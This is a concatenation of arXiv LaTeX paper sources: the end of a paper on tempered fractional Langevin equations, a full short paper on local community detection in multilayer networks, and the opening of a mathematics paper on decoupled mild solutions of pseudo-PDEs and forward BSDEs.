$\theta$, $2\lambda \sqrt{\frac{a}{4a\lambda^2-m\omega^2}}\rme^{-\frac{m\omega^2}{2a\lambda} t}$, and $\frac{4 \pi a\lambda}{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}$, respectively, being verified by the simulations given in Figure \ref{you} (a) and Figure \ref{you} (b). The simulation results for $H=0.8$ are presented in Figure \ref{0-8}, in which (a) shows that after changing the value of $H$, besides a little bit of the difference of the amplitude, the simulation results are still consistent with Eq. (\ref{cx}). We numerically detect that $C_x(t)$ is always zero crossing. For $\lambda\rightarrow 0$, the results for $C_x(t)$ of the fLe \cite{Burov} are recovered; see Figure \ref{wu}.
\begin{figure}
\flushright
\includegraphics[scale=0.375]{6aeps.eps}\\
\includegraphics[scale=0.375]{6beps.eps}\includegraphics[scale=0.375]{6ceps.eps}\\
\includegraphics[scale=0.375]{6deps.eps}\\
\caption{Eq. (\ref{cx}) (blue solid line) and the simulation results sampled over $1.5\times10^4$ trajectories (red data points) with $\lambda=0.1$ and $m=1$, $\omega=0.08$ for (a), $\omega=0.3$ for (b), $\omega=0.965$ (just simulation one) for (c), and $\omega=3$ (just simulation one) for (d). For all the simulations, $H=0.6$.
}\label{you}
\end{figure}
\begin{figure}
\flushright
\includegraphics[scale=0.38]{8aeps.eps}\\
\includegraphics[scale=0.38]{8beps.eps}\includegraphics[scale=0.38]{8ceps.eps}\\
\includegraphics[scale=0.38]{8deps.eps}\\
\caption
Eq. (\ref{cx}) (blue solid line) and the simulation results sampled over $1.5\times10^4$ trajectories (red data points) with $\lambda=0.1$ and $m=1$, $\omega=0.08$ for (a), $\omega=0.3$ (just simulation one) for (b), $\omega=0.965$ (just simulation one) for (c), and $\omega=3$ (just simulation one) for (d). For all the simulations, $H=0.8$.
}\label{0-8}
\end{figure}
\begin{figure}
\flushright
\quad\,\,\qquad\includegraphics[scale=0.38]{wuaeps.eps}\includegraphics[scale=0.38]{wubeps.eps}\\
\quad\quad\includegraphics[scale=0.38]{wuceps.eps}\\
\caption{Simulation results for $C_x(t)$ with $H=0.625$ and $\lambda=10^{-6}$, sampled over $10^4$
trajectories. (a): $\omega=0.3$, and the function decays monotonically; (b): $\omega=0.965$, the transition between the motions with and without zero crossing; (c): $\omega=3$, the underdamped regime. It shows that the simulation results are consistent with the theoretical ones in \cite{Burov} since $\lambda$ is very small.}\label{wu}
\end{figure}
\section{Conclusion}\label{four}
Tempered fractional Brownian motion is a recently introduced stochastic process, displaying localization diffusion. We further discuss its ergodicity and derive its Fokker-Planck equation. Then we introduce the tempered fractional Langevin equation with the tempered fractional Gaussian noise as internal noise. Both the undamped and overdamped cases are considered, and the evolution of the MSD is carefully investigated, revealing the procedure of transition and finally turning to the ballistic diffusion for long time. The normalized displacement correlation function $C_x(t)$ of the tempered fractional Langevin equation with harmonic potential is explicitly derived for small frequency.
By the algorithm provided in \ref{AppendixC},
almost all of the theoretical results are verified by numerical simulations.
\section*{Acknowledgments}
This work was supported by the National Natural Science Foundation of China under Grant No. 11671182.
| 2024-02-18T23:40:17.504Z | 2017-04-12T02:08:59.000Z | algebraic_stack_train_0000 | 1,949 | 6,538 |
|
proofpile-arXiv_065-9616 | \section{Introduction}\label{sec:intro}
The classic problem of community detection in a network graph corresponds to an optimization problem which is \textit{global} as it requires knowledge on the \textit{whole} network structure. The problem is known to be computationally difficult to solve, while its approximate solutions have to cope with both accuracy and efficiency issues that become more severe as the network increases in size.
Large-scale, web-based environments have indeed traditionally represented a natural scenario for the development and testing of effective community detection approaches.
In the last few years, the problem has attracted increasing attention in research contexts related to \textit{complex networks}~\cite{Mucha10,CarchioloLMM10,PapalexakisAI13,Kivela+14,DeDomenico15,Loe15,KimL15,Peixoto15},
whose modeling and analysis is widely recognized as a useful tool to better understand the characteristics and dynamics of multiple, interconnected types of node relations and interactions~\cite{BerlingerioPC13,Magnanibook}
Nevertheless, especially in social computing, one important aspect to consider
is that we might often want to identify the personalized network of social contacts of interest to a single user only. To this aim, we would like to determine the expanded neighborhood of that user which forms a densely connected, relatively small subgraph.
This is known as \textit{local community detection} problem~\cite{Clauset05,ChenZG09}, whose general objective is, given limited information about the network, to identify a community structure which is centered on one or few seed users.
Existing studies on this problem have focused, however, on social networks that are built on a single user relation type or context~\cite{ChenZG09,ZakrzewskaB15}.
As a consequence, they are not able to profitably exploit the fact that most individuals nowadays have multiple accounts across different social networks, or that relations of different types (i.e., online as well as offline relations) can be available for the same population of a social network~\cite{Magnanibook}.
In this work, we propose a novel framework based on the multilayer network model for the problem of local community detection, which overcomes the aforementioned limitations in the literature, i.e., community detection on a multilayer network but from a global perspective, and local community detection but limited to monoplex networks.
We have recently brought the local community detection problem into the context of multilayer networks~\cite{ASONAM16}, by providing a preliminary formulation based on an unsupervised approach. A key aspect of our proposal is the definition of similarity-based community relations that exploit both internal and external connectivity of the nodes in the community being constructed for a given seed, while accounting for different layer-specific topological information.
Here we push forward our research by introducing a parametric control in the similarity-based community relations for the layer-coverage diversification in the local community being discovered.
Our experimental evaluation conducted on three real-world multilayer networks has shown the significance of our approach.
\section{Multilayer Local Community Detection}
\label{sec:LCD}
\subsection{The \textsf{ML-LCD}\xspace method}
We refer to the multilayer network model described in~\cite{Kivela+14}.
We are given a set of layers $\mathcal{L}$
and a set of entities (e.g., users) $\V$. We denote with
$G_{\mathcal{L}} = (V_{\mathcal{L}}, E_{\mathcal{L}}, \V, \mathcal{L})$ the multilayer graph such that $V_{\mathcal{L}}$ is a set of pairs $v \in \V, L \in \mathcal{L}$, and $E_{\mathcal{L}} \subseteq V_{\mathcal{L}} \times V_{\mathcal{L}}$ is the set of undirected edges.
Each entity of $V$ appears in at least one layer, but not necessarily in all layers.
Moreover, in the following we will consider the specific case for which nodes connected through different layers the same entity in $\V$, i.e., $G_{\mathcal{L}}$ is a multiplex graph.
Local community detection approaches generally implement some strategy that at each step considers a node from one of three sets, namely: the community under construction (initialized with the seed node), the ``shell'' of nodes that are neighbors of nodes in the community but do not belong to the community, and the unexplored portion of the network.
A key aspect is hence how to select the \textit{best} node in the shell to add to the community to be identified.
Most algorithms, which are designed to deal with monoplex graphs, try to maximize a function in terms of the \textit{internal} edges, i.e., edges that involve nodes in the community, and to minimize a function in terms of the \textit{external} edges, i.e., edges to nodes outside the community. By accounting for both types of edges, nodes that are candidates to be added to the community being constructed are penalized in proportion to the amount of links to nodes external to the community~\cite{Clauset05}.
%
Moreover, as first analyzed in~\cite{ChenZG09}, considering the internal-to-external \textit{connection density} ratio (rather than the absolute amount of internal and external links to the community) allows for alleviating the issue of inserting many weakly-linked nodes (i.e., \textit{outliers}) into the local community being discovered.
In this work we follow the above general approach and extend it to identify local communities over a multilayer network.
Given $G_{\mathcal{L}} = (V_{\mathcal{L}}, E_{\mathcal{L}}, \V, \mathcal{L})$ and a seed node $v_0$, we denote with $C \subseteq \V$ the node set corresponding to the local community being discovered around node $v_0$; moreover, when the context is clear, we might also use $C$ to refer to the local community subgraph.
We denote with $S = \{v \in \V \setminus C \ | \ \exists ((u,L_i),(v,L_j)) \in E_{\mathcal{L}} \ \wedge \ u \in C\}$ the \textit{shell} set of nodes outside $C$,
and with
$B = \{ u \in C \ | \ \exists ((u,L_i),(v,L_j)) \in E_{\mathcal{L}} \ \wedge \ v \in S\}$ the \textit{boundary} set of nodes in $C$.
Our proposed method, named {\em {\bf M}ulti{\bf L}ayer {\bf L}ocal {\bf C}ommunity {\bf D}etection} (\textsf{ML-LCD}\xspace), takes as input the multilayer graph $G_{\mathcal{L}}$ and a seed node $v_0$, and computes the local community $C$ associated to $v_0$ by performing an iterative search that seeks to maximize the value of \textit{similarity-based local community function} for $C$ ($LC(C)$), which is obtained as the ratio of an \textit{internal community relation} $LC^{int}(C)$ to an \textit{external community relation} $LC^{ext}(C)$. We shall formally define these later in Section~\ref{sec:funcsim}.
Algorithm \textsf{ML-LCD}\xspace works as follows. Initially, the boundary set $B$ and the community $C$ are initialized with the starting seed, while the shell set $S$ is initialized with the neighborhood set of $v_0$ considering all the layers in $\mathcal{L}$.
Afterwards, the algorithm computes the initial value of $LC(C)$ and starts expanding the node set in $C$:
it evaluates all the nodes $v$ belonging to the current shell set $S$, then selects the vertex $v^{*}$ that maximizes the value of $LC(C)$.
The algorithm checks if \textit{(i)} $v^{*}$ actually increases the quality of $C$ (i.e., $LC(C \cup \{v^{*}\})>LC(C)$) and \textit{(ii)} $v^{*}$ helps to strength the internal connectivity of the community (i.e., $LC^{int}(C \cup \{v^*\}) > LC^{int}(C) $).
If both conditions are satisfied, node $v^{*}$ is added to $C$ and the shell set is updated accordingly, otherwise node $v^{*}$ is removed from $S$ as it cannot lead to an increase in the value of $LC(C)$. In any case, the boundary set $B$ and $LC(C)$ are updated. The algorithm terminates when no further improvement in $LC(C)$ is possible.
\subsection{Similarity-based local community function}
\label{sec:funcsim}
To account for the multiplicity of layers, we define the multilayer local community function $LC(\cdot)$ based on a notion of similarity between nodes. In this regard, two major issues are how to choose the analytical form of the similarity function, and how to deal with the different, layer-specific connections that any two nodes might have in the multilayer graph.
We address the first issue in an unsupervised fashion, by resorting to
any similarity measure that can express the topological affinity of two nodes in a graph.
Concerning the second issue, one straightforward solution is to determine the similarity between any two nodes focusing on each layer at a time. The above points are formally captured by the following definitions.
We denote with $E^C$ the set of edges between nodes that belong to $C$ and with $E_i^C$ the subset of $E^C$ corresponding to edges in a given layer $L_i$. Analogously, $E^B$ refers to the set of edges between nodes in $B$ and nodes in $S$, and $E_i^B$ to its subset corresponding to $L_i$.
Given a community $C$, we define the \textit{similarity-based local community function} $LC(C)$ as the ratio between the \textit{internal community relation} and \textit{external community relation}, respectively defined as:
\begin{equation}\label{eq:Def2_Lin}
LC^{int}(C)=\frac{1}{|C|}\sum_{v \in C} \sum_{L_i \in \mathcal{L}} \sum_{\substack{(u,v) \in E_i^C \ \wedge \ u \in C}} sim_i(u,v)
\end{equation}
\begin{equation}\label{eq:Def2_Lex}
LC^{ext}(C) = \frac{1}{|B|} \sum_{v \in B} \sum_{L_i \in \mathcal{L}} \sum_{\substack{(u,v) \in E_i^B \ \wedge \ u \in S}} sim_i(u,v)
\end{equation}
In the above equations, function $sim_i(u,v)$ computes the similarity between any two nodes $u,v$ contextually to layer $L_i$. In this work, we define it in terms of Jaccard coefficient, i.e.,
$sim_i(u,v) = \frac{|N_i(u) \cap N_i(v)|}{|N_i(u) \cup N_i(v)|}$,
where $N_i(u)$
denotes the set of neighbors of node $u$ in layer $L_i$.
\subsection{Layer-coverage diversification bias}
When discovering a multilayer local community centered on a seed node, the iterative search process in \textsf{ML-LCD}\xspace that seeks to maximize the similarity-based local community measure, explores the different layers of the network. This implies that the various layers might contribute very differently from each other in terms of edges constituting the local community structure.
In many cases, it can be desirable to control the degree of heterogeneity of relations (i.e., layers) inside the local community being discovered.
In this regard, we identify two main approaches:
\begin{itemize}
\item \textbf{Diversification-oriented approach.}
This approach relies on the assumption that a local community is better defined by increasing as much as possible the number of edges belonging to different layers.
More specifically, we might want to obtain a local community characterized by high diversification in terms of presence of layers and variability of edges coming from different layers.
\item \textbf{Balance-oriented approach.} Conversely to the previous case, the aim is to produce a local community that shows a certain \textit{balance} in the presence of layers, i.e., low variability of edges over the different layers.
This approach relies on the assumption that a local community might be well suited to real cases when it is uniformly distributed among the different edge types taken into account.
\end{itemize}
Following the above observations, here we propose a methodology to incorporate a parametric control
of the layer-coverage diversification in the local community being discovered.
To this purpose, we introduce a \textit{bias factor} $\beta$ in \textsf{ML-LCD}\xspace which impacts on the node similarity measure according to the following logic:
\begin{equation}
\beta=
\begin{cases}
(0, 1], & \textit{diversification-oriented bias}\\
0, & \textit{no bias}\\
[-1,0), & \textit{balance-oriented bias}
\end{cases}
\end{equation}
\noindent
Positive values of $\beta$ push the community expansion process towards a diversi\-fication-oriented approach, and, conversely, negative $\beta$ lead to different levels of balance-oriented scheme. Note that the \textit{no bias} case corresponds to handling the node similarity ``as is''.
Note also that, by assuming values in a continuous range, at each iteration \textsf{ML-LCD}\xspace is enabled to make a decision by accounting for a wider spectrum of degrees of layer-coverage diversification.
Given a node $v \in B$ and a node $u \in S$, for any $L_i \in \mathcal{L}$,
we define the $\beta$-biased similarity $sim_{\beta, i}(u,v)$ as follows:
\begin{eqnarray}
sim_{\beta, i}(u,v) = \frac{2sim_i(u,v)}{1+e^{-bf}},\\
bf=\beta[f(C \cup \{u\})-f(C)]
\end{eqnarray}
\noindent
where $bf$ is a \textit{diversification factor} and $f(C)$ is a function that measures the current diversification between the different layers in the community $C$; in the following, we assume it is defined as the standard deviation of the number of edges for each layer in the community.
The difference $f(C \cup \{u\})-f(C)$ is positive when the insertion of node $u$ into the community increases the coverage over a subset of layers, thus diversifying the presence of layers in the local community. Consequently, when $\beta$ is positive, the diversification effect is desired, i.e., there is a boost in the value of $sim_{\beta, i}$ (and vice versa for negative values of $\beta$).
Note that $\beta$ introduces a bias on the similarity between two nodes only when evaluating the inclusion of a shell node into a community $C$, i.e., when calculating $LC^{ext}(C)$.
\section{Experimental Evaluation}
\label{sec:results}
We used three multilayer network datasets, namely
\textit{Airlines} (417 nodes corresponding to airport locations, 3588 edges, 37 layers corresponding to airline companies)~\cite{Cardillo}, \textit{AUCS} (61 employees as nodes, 620 edges, 5 acquaintance relations as layers)~\cite{Magnanibook}, and \textit{RealityMining} (88 users as nodes, 355 edges, 3 media types employed to communicate as layers)~\cite{KimL15}. All network graphs are undirected, and inter-layer links are regarded as coupling edges.
\begin{table}[t!]
\caption{Mean and standard deviation size of communities by varying $\beta$ (with step of 0.1).}
\centering
\scalebox{0.8}{
\begin{tabular}{|l|l||c|c|c|c|c|c|c|c|c|c|c|}
\hline
dataset & & -1.0 & -0.9 & -0.8 & -0.7 & -0.6 & -0.5 & -0.4 & -0.3 & -0.2 & -0.1 & \cellcolor{blue!15}0.0 \\ \hline
\multirow{ 2}{*}{\textit{Airlines}} & \textit{mean} & 5.73 & 5.91 & 6.20 & 6.47 & 6.74 & 7.06 & 7.57 & 8.10 & 9.13 & 10.33 & \cellcolor{blue!15}11.33 \\
& \textit{sd} & 4.68 & 4.97 & 5.45 & 5.83 & 6.39 & 6.81 & 7.63 & 8.62 & 10.58 & 12.80 & \cellcolor{blue!15}14.78 \\ \hline
\multirow{ 2}{*}{\textit{AUCS}} & \textit{mean} & 6.38 & 6.59 & 6.64 & 6.75 & 6.84 & 6.85 & 6.92 & 7.13 & 7.16 & 7.77 & \cellcolor{blue!15}7.90 \\
& \textit{sd} & 1.48 & 1.51 & 1.59 & 1.69 & 1.85 & 1.85 & 1.87 & 2.15 & 2.18 & 2.40 & \cellcolor{blue!15}2.74 \\ \hline
\textit{Reality-} & \textit{mean} & 3.21 & 3.24 & 3.25 & 3.25 & 3.32 & 3.32 & 3.34 & 3.34 & 3.34 & 3.37 & \cellcolor{blue!15}3.37 \\
\textit{Mining} & \textit{sd} & 1.61 & 1.64 & 1.66 & 1.66 & 1.73 & 1.73 & 1.74 & 1.74 & 1.74 & 1.77 & \cellcolor{blue!15}1.77 \\
\hline
\end{tabular}
}
\\
\vspace{2mm}
\scalebox{0.8}{
\begin{tabular}{|l|l||c|c|c|c|c|c|c|c|c|c|}
\hline
dataset & & 0.1 & 0.2 & 0.3 & 0.4 & 0.5 & 0.6 & 0.7 & 0.8 & 0.9 & 1.0 \\ \hline
\multirow{ 2}{*}{\textit{Airlines}} & \textit{mean} & 9.80 & 9.02 & 8.82 & 8.37 & 8.20 & 7.93 & 7.53 & 7.26 & 7.06 & 7.06 \\
& \textit{sd} & 12.10 & 10.61 & 10.07 & 9.39 & 9.15 & 8.67 & 7.82 & 7.46 & 7.35 & 7.27 \\ \hline
\multirow{ 2}{*}{\textit{AUCS}} & \textit{mean} & 8.77 & 8.92 & 8.92 & 8.89 & 8.89 & 8.89 & 8.87 & 8.85 & 8.85 & 8.85 \\
& \textit{sd} & 3.16 & 3.33 & 3.33 & 3.27 & 3.27 & 3.27 & 3.26 & 3.23 & 3.23 & 3.23 \\ \hline
\textit{Reality-} & \textit{mean} & 3.38 & 3.39 & 3.39 & 3.39 & 3.36 & 3.36 & 3.32 & 3.18 & 3.17 & 3.17 \\
\textit{Mining} & \textit{sd} & 1.78 & 1.78 & 1.78 & 1.78 & 1.74 & 1.74 & 1.71 & 1.60 & 1.59 & 1.59 \\
\hline
\end{tabular}
}
\label{tab:size}
\end{table}
\textbf{Size and structural characteristics of local communities.\ }
We first analyzed the size of the local communities extracted by \textsf{ML-LCD}\xspace for each node.
Table~\ref{tab:size} reports on the mean and standard deviation of the size of the local communities by varying of $\beta$.
As regards the \textit{no bias} solution (i.e, $\beta=0.0$), largest local communities correspond to \textit{Airlines} (mean 11.33 $\pm$ 14.78), while medium size communities (7.90 $\pm$ 2.74) are found for \textit{AUCS} and relatively small communities (3.37 $\pm$ 1.77) for \textit{RealityMining}.
The impact of $\beta$ on the community size is roughly proportional to the number of layers, i.e., high on \textit{Airlines}, medium on \textit{AUCS} and low on \textit{RealityMining}. For \textit{Airlines} and \textit{AUCS}, smallest communities are obtained with the solution corresponding to $\beta=-1.0$, thus suggesting that the discovery process becomes more xenophobic (i.e., less inclusive) while shifting towards a balance-oriented scheme.
Moreover, on \textit{Airlines}, the mean size follows a roughly normal distribution, with most inclusive solution (i.e., largest size) corresponding to the unbiased one. A near normal distribution (centered on $0.2 \leq \beta \leq 0.4$) is also observed for \textit{RealityMining}, while mean size values linearly increase with $\beta$ for \textit{AUCS}.
To understand the effect of $\beta$ on the structure of the local communities,
we analyzed the distributions of per-layer mean \textit{average path length} and mean \textit{clustering coefficient} of the identified communities (results not shown). One major remark is that on the networks with a small number of layers, the two types of distributions tend to follow an increasing trend for balance-oriented bias (i.e., negative $\beta$), which becomes roughly constant for the diversification-oriented bias (i.e., positive $\beta$). On \textit{Airlines}, variability happens to be much higher for some layers, which in the case of mean average path length ranges between 0.1 and 0.5 (as shown by a rapidly decreasing trend for negative $\beta$, followed by a peak for $\beta=0.2$, then again a decreasing trend).
\begin{figure}[t!]
\centering
\subfigure[\textit{Airlines}]{\includegraphics[width=0.32\columnwidth]{layers_per_communities_per_beta_lcd2_airlines.png}}
\subfigure[\textit{AUCS}]{\includegraphics[width=0.32\columnwidth]{layers_per_communities_per_beta_lcd2_aucs.png}}
\subfigure[\textit{RealityMining}]{\includegraphics[width=0.32\columnwidth]{layers_per_communities_per_beta_lcd2_rm.png}}
\caption{Distribution of number of layers over communities by varying $\beta$. Communities are sorted by decreasing number of layers.}
\label{fig:betalayers}
\end{figure}
\textbf{Distribution of layers over communities.\ }
We also studied how the bias factor impacts on the distribution of number of layers over communities, as shown in Figure~\ref{fig:betalayers}.
This analysis confirmed that using positive values of $\beta$ produces
local communities that lay on a higher number of layers. This outcome can be easily explained since positive values of $\beta$ favor the inclusion of nodes into the community which increase layer-coverage diversification, thus enabling the exploration of further layers also in an advanced phase of the discovering process. Conversely, negative values of $\beta$ are supposed to yield a roughly uniform distribution of the layers which are covered by the community, thus preventing the discovery process from including nodes coming from unexplored layers once the local community is already characterized by a certain subset of layers.
As regards the effects of the bias factor on the layer-coverage diversification,
we analyzed the standard deviation of the per-layer number of edges by varying $\beta$ (results not shown, due to space limits of this paper).
As expected, standard deviation values are roughly proportional to the setting of the bias factor for all datasets.
Considering the local communities obtained with negative $\beta$, the layers on which they lay are characterized by a similar presence (in terms of number of edges) in the induced community subgraph.
Conversely, for the local communities obtained using positive $\beta$, the induced community subgraph may be characterized by a small subset of layers, while other layers may be present with a smaller number of relations.
\begin{figure}[t!]
\centering
\subfigure[\textit{Airlines}]{\includegraphics[width=0.45\columnwidth]{jac_log2_filter_airlines.png}}
\subfigure[\textit{AUCS}]{\includegraphics[width=0.45\columnwidth]{jac_log2_filter_aucs.png}}
\caption{Average Jaccard similarity between solutions obtained by varying $\beta$.}
\label{fig:betalayers_jac}
\end{figure}
\textbf{Similarity between communities.\ }
The smooth effect due to the diversification-oriented bias is confirmed when analyzing the similarity between the discovered local communities. Figure~\ref{fig:betalayers_jac} shows the average Jaccard similarity between solutions obtained by varying $\beta$ (i.e., in terms of nodes included in each local community). Jaccard similarities vary in the range $[0.75,1.0]$ for \textit{AUCS} and \textit{Airlines}, and in the range $[0.9,1.0]$ for \textit{RealityMining} (results not shown).
For datasets with a lower number of layers (i.e., \textit{AUCS} and \textit{RealityMining}), there is a strong separation between the solutions obtained for $\beta>0$ and the ones obtained with $\beta<0$.
On \textit{AUCS}, the local communities obtained using a diversification-oriented bias show Jaccard similarities close to $1$, while there is more variability among the solutions obtained with the balance-oriented bias. Effects of the bias factor are lower on \textit{RealityMining}, with generally high Jaccard similarities.
On \textit{Airlines}, the effects of the bias factor are still present but smoother, with gradual similarity variations in the range $[0.75,1.0]$.
\section{Conclusion}
\label{sec:conclusion}
We addressed the novel problem of local community detection in multilayer networks, providing a greedy heuristic that iteratively attempts to maximize the internal-to-external connection density ratio by accounting for layer-specific topological information.
Our method is also able to control the layer-coverage diversification in the local community being discovered, by means of a bias factor embedded in the similarity-based local community function.
Evaluation was conducted on real-world multilayer networks.
As future work, we plan to study alternative objective functions for the ML-LCD problem. It would also be interesting to enrich the evaluation part based on data with ground-truth information.
We also envisage a number of application problems for which ML-LCD methods can profitably be used, such as friendship prediction, targeted influence propagation, and more in general, mining in incomplete networks.
| 2024-02-18T23:40:17.620Z | 2017-04-12T02:11:05.000Z | algebraic_stack_train_0000 | 1,955 | 3,771 |
|
proofpile-arXiv_065-9674 | \section{Introduction}
The framework of this paper is the canonical space
$\Omega = \mathbbm{D}([0,T],E)$ of cadlag functions defined on
the interval $[0,T]$
with values in a Polish space $E$. This space will be equipped
with a family $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ of probability measures
indexed by an initial time $s\in[0,T]$ and a starting point $x \in E$.
For each $(s,x)\in[0,T]\times E$, $\mathbbm{P}^{s,x}$ corresponds to
the law of an underlying forward Markov process with time index $[0,T]$, taking values in the Polish state space $E$ which is
characterized as the solution of a well-posed martingale problem
related to a certain operator $(\mathcal{D}(a),a)$ and an increasing continuous
function $V:[0,T] \rightarrow {\mathbbm R}$.
In the companion paper
\cite{paper1preprint}
we have introduced a semilinear equation generated by $(\mathcal{D}(a),a)$, called
{\it Pseudo-PDE} of the type
\begin{equation}\label{PDEIntro}
\left\{
\begin{array}{rccc}
a(u) + f\left(\cdot,\cdot,u,\sqrt{\Gamma(u,u)}\right)&=&0& \text{ on } [0,T]\times E \\
u(T,\cdot)&=&g,&
\end{array}\right.
\end{equation}
where $\Gamma(u,u)=a(u^2)-2ua(u)$ is a potential theory operator called
the {\it carr\'e du champs operator}.
A classical solution of \eqref{PDEIntro} is defined as an element of
$\mathcal{D}(a)$ verifying \eqref{PDEIntro}. In
\cite{paper1preprint}
we have also defined the notion of {\it martingale solution}
of \eqref{PDEIntro}, see Definition \ref{D417}.
A function $u$ is a martingale solution if \eqref{PDEIntro}
holds replacing the map $a$ (resp. $\Gamma$) with an extended
operator $\mathfrak{a}$ (resp. $\mathfrak{G}$) which is introduced
in Definition \ref{extended} (resp. \ref{extendedgamma}).
The martingale solution extends the (analytical) notion
of classical solution, however it is a probabilistic concept.
The objectives of the present paper are essentially three.
\begin{enumerate}
\item To introduce an alternative notion of (this time analytical) solution,
that we call {\it decoupled mild},
since it makes use of the time-dependent transition kernel
associated with $a$.
This new type of solution will be shown to be essentially equivalent to
the martingale one.
\item To show existence and uniqueness of decoupled mild solutions.
\item To emphasize the link with solutions of forward BSDEs (FBSDEs)
without driving martingale introduced in
\cite{paper1preprint}.
\end{enumerate}
The over-mentioned FBSDEs are of the form
\begin{equation}\label{BSDEIntro}
Y^{s,x}_t = g(X_T) + \int_t^T f\left(r,X_r,Y^{s,x}_r,\sqrt{\frac{d\langle M^{s,x}\rangle}{dV}}(r)\right)dV_r -(M^{s,x}_T - M^{s,x}_t),
\end{equation}
in a stochastic basis $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ which depends on $(s,x)$. Under suitable conditions, the solution of
this FBDSE is a couple $(Y^{s,x},M^{s,x})$
of cadlag stochastistic processes where $M^{s,x}$ is a martingale.
This was introduced and studied in \cite{paper1preprint}.
We refer to the introduction and reference list of previous paper
for an extensive description of contributions to non-Brownian type BSDEs.
\\
\\
The classical forward BSDE, which is driven by a Brownian motion
is of the form
\begin{equation}\label{BrownianBSDE}
\left\{\begin{array}{rcl}
X^{s,x}_t &=& x+ \int_s^t \mu(r,X^{s,x}_r)dr +\int_s^t \sigma(r,X^{s,x}_r)dB_r\\
Y^{s,x}_t &=& g(X^{s,x}_T) + \int_t^T f\left(r,X^{s,x}_r,Y^{s,x}_r,Z^{s,x}_r\right)dr -\int_t^T Z^{s,x}_rdB_r,
\end{array}\right.
\end{equation}
where $B$ is a Brownian motion.
Existence and uniqueness for \eqref{BrownianBSDE}
was established first
supposing mainly Lipschitz conditions on $f$ with respect to the third
and fourth variable. $\mu$ and $\sigma$ were also assumed to be
Lipschitz (with respect to $x$) and to have linear growth.
In the sequel those conditions were
considerably relaxed, see \cite{PardouxRascanu}
and references therein.
This is a particular case of a more general (non-Markovian) Brownian BSDE
introduced in 1990 by E. Pardoux and
S. Peng in \cite{parpen90}, after an early work
of J.M. Bismut in 1973 in \cite{bismut}.
Equation \eqref{BrownianBSDE} was a probabilistic representation of
a semilinear partial differential
equation of parabolic type with terminal condition:
\begin{equation}\label{PDEparabolique}
\left\{
\begin{array}{l}
\partial_tu + \frac{1}{2}\underset{i,j\leq d}{\sum} (\sigma\sigma^\intercal)_{i,j}\partial^2_{x_ix_j}u + \underset{i\leq d}{\sum} \mu_i\partial_{x_i}u + f(\cdot,\cdot,u,\sigma\nabla u)=0\quad \text{ on } [0,T[\times\mathbbm{R}^d \\
u(T,\cdot) = g.
\end{array}\right.
\end{equation}
Given, for every $(s,x)$, a solution $(Y^{s,x}, Z^{s,x})$ of the FBSDE \eqref{BrownianBSDE},
under some continuity assumptions on the coefficients, see e.g. \cite{pardoux1992backward}, it was proved that
the function $u(s,x):= Y^{s,x}_s$ is
a viscosity solution of \eqref{PDEparabolique},
see also \cite{peng1991probabilistic,
pardoux1992backward, peng1991probabilistic, el1997backward}, for related work.
We prolongate this idea in a general case where the FBSDE is
\eqref{BSDEIntro} with solution $(Y^{s,x}, M^{s,x})$.
In that case $u(s,x):= Y^{s,x}_s$ will be the decoupled mild solution of
\eqref{PDEIntro}, see Theorem \ref{Representation};
in that general context the decoupled mild solution replaces
the one of viscosity, for reasons that we will explain below.
One celebrated problem in the case of Brownian FBSDEs is the characterization
of $Z^{s,x}$ through a deterministic function $v$.
This is what we will call the {\it identification problem}.
In general the link between
$v$ and $u$ is not always analytically established, excepted when $u$
has some suitable differentiability property, see e.g.
\cite{barles1997sde}:
in that case $v$ is closely related to the gradient of $u$.
In our case, the notion of decoupled mild solution allows to identify $(u,v)$
as the analytical solution of a deterministic problem.
In the literature, the notion of mild
solution of PDEs was used in finite dimension in
\cite{BSDEmildPardouxBally},
where the authors tackled diffusion operators generating symmetric Dirichlet forms and associated Markov processes thanks to the theory of Fukushima Dirichlet forms, see e.g. \cite{fuosta}.
Infinite dimensional setups were considered for example
in \cite{fuhrman_tessitore02} where an infinite
dimensional BSDE could produce the mild solution of a PDE on a
Hilbert space.
Let $B$ be a functional Banach space $(B,\|\cdot\|)$
of real Borel functions defined on $E$
and
$A$ be an unbounded operator on $(B,\|\cdot\|)$.
In the theory of evolution equations one often considers systems of
the type
\begin{equation}\label{linear}
\left\{\begin{array}{rcl}
\partial_tu+Au &=& l \text{ on }[0,T]\times\mathbbm{R}^d\\
u(T,\cdot) &=& g,
\end{array}\right.
\end{equation}
where
$l:[0,T] \times \mathbbm{R}^d \rightarrow {\mathbbm R}$
and $g:\mathbbm{R}^d \rightarrow {\mathbbm R}$ are
such that $l(t,\cdot)$ and $g$ belong to $B$ for every
$t \in [0,T]$.
The idea of mild solutions
consists to consider $-A$ (when possible) as the infinitesimal generator
of a semigroup of operators
$(P_t)_{t\geq 0}$ on $(B,\|\cdot\|)$,
in the following sense. There is $\mathcal{D}(A) \subset B$,
a dense subset on which
$-A f=\underset{t\rightarrow 0^+}{\text{lim }}\frac{1}{t}(P_tf-f)$.
In particular one may think of $(P_t)_{t\geq 0}$ as the heat kernel semi-group and
$A$ as $\frac{1}{2}\Delta $.
The approach of mild solutions is also very popular in the framework of
stochastic PDEs see e. g.
\cite{daprato_zabczyk14}.
\\
When $A$ is a local operator, one solution (in the sense of distributions, or in the sense of
evaluation against test functions)
to the linear evolution problem with terminal condition
\eqref{linear} is
the so called {\it mild solution}
\begin{equation}\label{mildlinear}
u(s,\cdot)= P_{T-s}[g] - \int_s^T P_{r-s}[l(r,\cdot)]dr.
\end{equation}
If $ l$ is explicitly a function of $u$ then
\eqref{mildlinear} becomes itself an equation
and a mild solution would consist in finding a fixed
point of \eqref{mildlinear}.
Let us now suppose the existence of a
map
$S: \mathcal{D}(S) \subset B \rightarrow B$, typically $S$ being the gradient,
when $(P_t)$ is the heat kernel semigroup.
The natural question is what would be a natural replacement for
a {\it mild solution}
for
\begin{equation}\label{linearS}
\left\{\begin{array}{rcl}
\partial_tu+Au &=& f(s,\cdot,u,Su) \text{ on }[0,T]\times\mathbbm{R}^d\\
u(T,\cdot) &=& g.
\end{array}\right.
\end{equation}
If the domain of $S$ is $B$, then it is not
difficult to extend the notion of mild solution to this case.
One novelty of our approach consists is considering
the case of solutions $u:[0,T] \times \mathbbm{R}^d \rightarrow \mathbbm{R}$
for which $Su(t,\cdot)$ is not defined.
\begin{enumerate}
\item Suppose one expects a solution not to be classical,
i.e. such that $u(r,\cdot)$ should
